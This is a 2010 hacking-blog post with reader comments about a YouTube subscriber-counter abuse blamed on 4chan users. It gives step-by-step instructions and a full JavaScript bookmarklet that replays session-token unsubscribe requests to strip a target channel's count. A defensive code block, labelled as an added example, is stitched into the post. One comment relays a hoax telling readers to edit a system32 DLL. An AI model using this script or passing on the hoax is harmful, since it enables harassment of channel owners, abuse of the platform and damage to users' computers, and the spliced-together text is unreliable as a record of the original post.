The Hack o blog

Reinventing the wheel

YouTube subscriber glitch Fred and TunderF00T got hacked

Anonymous with Guy Fawkes masks at Scientology...

Today multiple YouTube accounts got “hacked”, and the attack is still going on. It was perpetrated by the /B/tards of the ever more infamous 4Chan (“thanks moot”). Accounts that were affected include Fred and TunderF00t, and the problem has not yet been sorted. The YouTube subscriber glitch allows an attacker to take out all of the subscribers of a channel; it uses a hole in the JavaScript, a lack of verification.

I will write up how this script worked, but for now here is the malicious code.

This is how it works: the script in the API usually requires a user to validate the action; the script overrides that, picks a random user to validate and unsubscribes them. The user isn’t in actuality unsubscribed and the counter is merely decremented. YouTube have had problems in the past with the counters being artificially increased; they haven’t fixed the problem and all they do is recount the subscribers.

Do not do this!!

1. Locate the target channel and subscribe

2. Open multiple page tabs

3. Paste this code into the browser’s address bar

javascript:function unsubscribe() {
    /* synchronous POST to the subscription endpoint for the prompted username */
    httpreq = new XMLHttpRequest();
    httpreq.open('post', '/ajax_subscriptions?edit_subscription=newsub&username=' + username + '&subscription_level=unsubscribe', false);
    httpreq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    httpreq.send('session_token=' + yt.getConfig('SUBSCRIBE_AXC'));
    if (!httpreq.responseXML) {
        setTimeout('unsubscribe()', timeout);
        return;
    }
    /* anything other than the success message is shown to the user */
    if (httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue != ' </address>\n<h2>You have successfully unsubscribed.</h2>\n') {
        alert(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue);
    } else if ((window.status = ++count) != times) {
        setTimeout('unsubscribe()', timeout);
    } else {
        alert('DUN');
    }
}
count = 0;
if ((username = prompt('enter target\'s username', '\\*username here *\\')) != null) {
    if (!isNaN(timeout = parseInt(prompt('enter timeout in milliseconds', 250)))) {
        if (!isNaN(times = parseInt(prompt('enter num of times to unsubscribe (0 = unlimited)', 0)))) {
            unsubscribe();
        }
    }
}
void(0);

A quick note: the code no longer works. There will be more attacks like this in the future, so make sure you subscribe for more tips and hacks from the HackOBlog team. Thanks to InfouPlink for the plug.
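The flaw described above, an unsubscribe request that decrements the channel counter without checking that a subscription was actually removed, is shown here next to a corrected handler that also tallies replayed requests. This is an added example, not code from the original post or from YouTube; the in-memory channel model, function names and sample accounts are hypothetical.

```javascript
// Added illustration: in-memory model, names and accounts are hypothetical.
function makeChannel(subscribers) {
  return { members: new Set(subscribers), counter: subscribers.length, noops: new Map() };
}

// Flawed pattern from the post: every request decrements the cached counter,
// whether or not a subscription was actually removed.
function unsubscribeFlawed(channel, user) {
  channel.members.delete(user);
  channel.counter -= 1;
  return channel.counter;
}

// Corrected pattern: the counter moves only when a real membership is removed,
// so replaying the request is a no-op; no-ops are tallied per account.
function unsubscribeChecked(channel, user) {
  if (channel.members.delete(user)) {
    channel.counter -= 1;
  } else {
    channel.noops.set(user, (channel.noops.get(user) || 0) + 1);
  }
  return channel.counter;
}

// Recount: the membership set is the source of truth; returns the drift fixed.
function recount(channel) {
  const drift = channel.counter - channel.members.size;
  channel.counter = channel.members.size;
  return drift;
}

// Accounts with at least `threshold` no-op unsubscribes: a replay signal.
function suspects(channel, threshold) {
  return [...channel.noops].filter(([, n]) => n >= threshold).map(([u]) => u);
}

// Constructed scenario: "mallory" replays one unsubscribe request `times` times.
function replay(handler, times) {
  const channel = makeChannel(["alice", "bob", "carol", "mallory"]);
  for (let i = 0; i < times; i++) handler(channel, "mallory");
  const shown = channel.counter;
  return { shown, real: channel.members.size, flagged: suspects(channel, 3), drift: recount(channel) };
}

console.log("flawed :", replay(unsubscribeFlawed, 5));
console.log("checked:", replay(unsubscribeChecked, 5));
```

With the flawed handler the displayed count drifts below the real membership and only a recount repairs it; with the checked handler the count stays correct and the replaying account is flagged.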

61 responses to “YouTube subscriber glitch Fred and TunderF00T got hacked”

  1. rawr August 25, 2010 at 8:26 PM

    Lol pwned.

  2. Lux August 25, 2010 at 9:06 PM

    Pretty sweet but it will get your account perma banned from youtube.

    • HackOblog August 25, 2010 at 9:16 PM

      yes it will, it could even lead to police intervention depending on the country you are from

      • IOA August 26, 2010 at 4:43 AM

        Really? In which country?

      • JaTochNietDan August 27, 2010 at 5:19 AM

        Wrong, script exploitation is not against the law, it is up to the webmasters to keep their own stuff secure. No law enforcement will be able to punish someone for technically using what could be seen as a feature rather than a hole in security.

        It was just bad security by the YouTube developers.

        • Don Viszneki January 30, 2012 at 9:04 PM

          I am not a lawyer. And I realize this is an old article, but someone might come across it and maybe I’m contributing something.

          It’s illegal in plenty of US States. I’m from Pennsylvania, and here is a link to the current statute:

          http://www.legis.state.pa.us/WU01/LI/LI/CT/HTM/18/00.076.015.000..HTM

          In the language of the statute, a judge might rule that this constitutes “alter or erase any computer data, computer programs or computer software;”

          It is the subscription count that is altered.

          For an interesting discussion on the subject of human law and what one might call “computer law,” the laws that computers obey, check out the book “Code and Other Laws of Cyberspace” by Lawrence Lessig.

      • HackOblog August 27, 2010 at 7:48 PM

        and yes, in some countries malicious script execution can be illegal

      • ROFLShtudios September 5, 2010 at 4:08 PM

        Hey guys, no, it will not make you banned, it simply duplicates them
        I know the guy who did it and he has been free for 2 weeks now, we both live in Ireland by the way
        peace

      • KhanKuun January 22, 2012 at 10:39 AM

        who fucking cares about that, really. maybe in police state eu and us but nowhere else where freedom still exists

  3. Brian August 25, 2010 at 9:19 PM

    Very cool you guys, does this still work? How come others lost subs and some even 500 subs total? Doesn’t make sense or is it because of the youtube boxes?

    • HackOblog August 25, 2010 at 9:26 PM

      Yes it still works, but using it will get you beaned permanently from youtube.

      • Brian August 25, 2010 at 9:37 PM

        No problem, I wasn’t wanting to do that, I’m a youtube partner so last I would want to use such a code… it stopped though, any idea why? Have the hackers been caught? Also, do they IP ban or username ban?

        • HackOblog August 26, 2010 at 12:37 AM

          All the users caught using this script have had their accounts banned, there won’t be a fix by the looks of it, they will just recount the subscribers, and wait till the /b/ gets bored

      • lolftw August 26, 2010 at 12:42 PM

        will it ban your ip?

        • HackOblog August 26, 2010 at 2:49 PM

          no your account

      • POLARDESTRUCTION August 26, 2010 at 10:22 PM

        Yeah, HackOblog is right. Don’t do this, you may be beaned…

  4. awesome August 25, 2010 at 9:45 PM

    awesome!!!

  5. awesome August 25, 2010 at 9:47 PM

    check out : youtube.com/watch?v=J82lqgrc-rM
    also what’s the one for ADDING subscribers?

  6. json derailo August 25, 2010 at 10:03 PM

    Originally it was done in PHP.
    Old code as fuck.
    Goddamn script kiddies taking the victory in other people’s work.

    • HackOblog August 25, 2010 at 10:11 PM

      I’m not sure it was in PHP, but I know what you mean, it’s not really hacking, hacking would involve some effort but what would you expect from /B/

      • json derailo August 25, 2010 at 10:17 PM

        It was PHP, made 2 years ago.
        Never fixed. You might find the original hack by putting in site:pastebin.com whatever in google.

        • c0l3a5h3r July 20, 2011 at 10:37 PM

          It was javascript. don’t assume things when you don’t even know the language.

      • LOLOLOL August 26, 2010 at 1:50 PM

        Sure it is , on the part of the person who discovered this specific glitch . Whether or not it’s the same person as the one who started the attack on Fred , I don’t know . As for everyone else , most were just volunteers . Can’t call them hackers , just fredhaters . Hell , even I used it for a few seconds , didn’t notice anything going on so I closed it

  7. jake August 26, 2010 at 2:08 AM

    hahahahahahhahaahaahahahahahahahhaha fred deserved it lol n00b

  8. madleish August 26, 2010 at 2:09 AM

    how does this work simply copy and pasting does not work (i only want to try this out on my own channel)

  9. Roxy August 26, 2010 at 3:07 AM

    DO NOT DO THIS! Yes…so put it where people CAN do it ._.

    • HackOblog August 26, 2010 at 7:40 PM

      it no longer works, well for now, and it’s information, the more widespread a bug is the faster it is fixed, information wants to be free and so on

  10. Bubbles August 26, 2010 at 3:12 AM

    thumbs up if traveler sent u here.

  11. Pingback: Anonymous Is raiding Fred's youtube, Deleting a huge load of his subscribers.

  12. Mr.Taco August 26, 2010 at 3:31 AM

    Err… you misspelled “ThunderF00T”
    Who would ever want to hack him lol??

    • HackOblog August 26, 2010 at 3:43 AM

      I have misspelled a lot of it, its the H0B moto Bad Spelling lol

  13. bigballz August 26, 2010 at 3:43 AM

    Do SxePhil’s dumb azz next!

  14. dv August 26, 2010 at 4:03 AM

    hack justin beavers next!! how about not!!!

  15. apOcalYpse August 26, 2010 at 4:53 AM

    Lol 4chan FTW! 😀

    well this happens if great minds think alike 😀

  16. Tompskamp August 26, 2010 at 6:41 AM

    I saw this on /b/:

    “Hey newfags, I bet you didn’t know that you could get rid of those annoying captchas did you?
    Well I’m feeling generous today and I thought i’d help you out and give some protips.

    To remove captchas simply. (Sorry Windows only, macs are gay anyway)

    1. Open My Computer.

    2. Click C: drive, then open WINDOWS folder.

    3. Find system32, DO NOT DELETE THIS FOLDER.

    4. Open system32, and find a file called capesnpn.dll.

    5. Click open with and choose notepad (Make sure
    you click always open with this program)

    6. Hit ctrl+F and find the code 0000a1b34 and delete it.

    7. Save the file and voila! no more captchas!

    This works because the captcha is stored on your PC, and doesn’t work anymore if you delete that code!

    TL ; DR – Get rid of captcha, read steps 1-7”

    is this true? is it safe? or is it a scam?

    • HackOblog August 26, 2010 at 7:35 PM

      no it’s not true, don’t do it.

    • c0l3a5h3r July 20, 2011 at 10:39 PM

      no. it will mess up your computer.

  17. Hurp August 26, 2010 at 8:24 AM

    I’m sorry, but what’s a /B/tard?

    • HackOblog August 26, 2010 at 2:53 PM

      basically it’s the name given to the users of the /b/ board of 4chan

  18. Hellokitty92 August 26, 2010 at 12:13 PM

    WHAT IS THE HACKERS UTUBE ACCOUNT SO I KNOW WHO NOT TO SUB
    AND WHAT KIND OF VIDEOS ARE THERE

  19. Pingback: YouTube got hacked

  20. Pingback: TechieGeeky.com – Tech news and reviews » Blog Archive » Fred can haz 1337 h4x?

  21. Danny August 26, 2010 at 4:14 PM

    Uh…I don’t know what /B/ is. But, it wasn’t 4Chan, it was EBaums. 4Chan is a nice, family-friendly site.

    • lolwut August 26, 2010 at 5:38 PM

      “4chan is a nice, family-friendly site”
      fail…

    • c0l3a5h3r July 20, 2011 at 10:40 PM

      lol. 4chan and family-friendly do not belong in the same sentence. give the site a peek if you want to know what I mean.

  22. Mitch August 26, 2010 at 4:22 PM

    clever bastards

  23. Pingback: An Internet Marketer Can Get Targeted Traffic Free, With Ezines! | Dan's Internet Marketing Business Blog!

  24. Pingback: Top Posts — WordPress.com

  25. Lol August 27, 2010 at 1:01 AM

    I think it’s funny, because people like me who have no subs could sit back and laugh as the fags cry and wonder why their subs were going down. I also love how people say it was Ebaums, or whatever. Those newfags couldn’t do shit like this.

  26. ikon August 27, 2010 at 12:19 PM

    Now a technical question, instead of all this… Why is the ‘username’ variable undefined?

    As in: edit_subscription=newsub&username='+username+'&subscription_level=unsubscribe', false);

    • HackOblog August 27, 2010 at 11:53 PM

      I will attempt to answer technical questions in an upcoming post, do feel free to email me any you have

    • n August 28, 2010 at 7:42 PM

      The script prompts the user for the username before calling the unsubscribe function.

  27. LULZ August 27, 2010 at 4:52 PM

    They did it for the LULZ

  28. 3cho911 August 28, 2010 at 1:49 AM

    Wow the guys who did that were completely stupid.

  29. idoporges August 28, 2010 at 8:57 PM

    well if they hacked FRED …… then its fine by me !

  30. lerg August 29, 2010 at 4:34 AM

    4chan fails at life and everything else they do! Fred is alright but he gets annoying and isn’t it called harassment or something like that?

  31. Downloadhack October 3, 2010 at 10:29 PM

    Very interesting, i think it is very important to know that. Don’t hesitate to share it again, i think it is so useful to know.

  32. Dapizz January 16, 2012 at 3:59 PM

    The script in the API? That makes no sense.

  33. ANONYMOUS January 19, 2012 at 2:00 AM

    We are anonymous.
    We are Legion.
    United as ONE.
    Divided by zero.
    We do not forgive Censorship.
    We do not forget Oppression.
    US SENATE…
    Expect us!!

    • mudkip January 28, 2012 at 7:37 PM

      I will take your united 1, and divide it by 0. 0000000000000000000000000000000000000000000000000000000000000

  34. :) January 27, 2012 at 11:22 PM

    Well they were smart to find this and all. 4chan has some pretty smart guys on it.
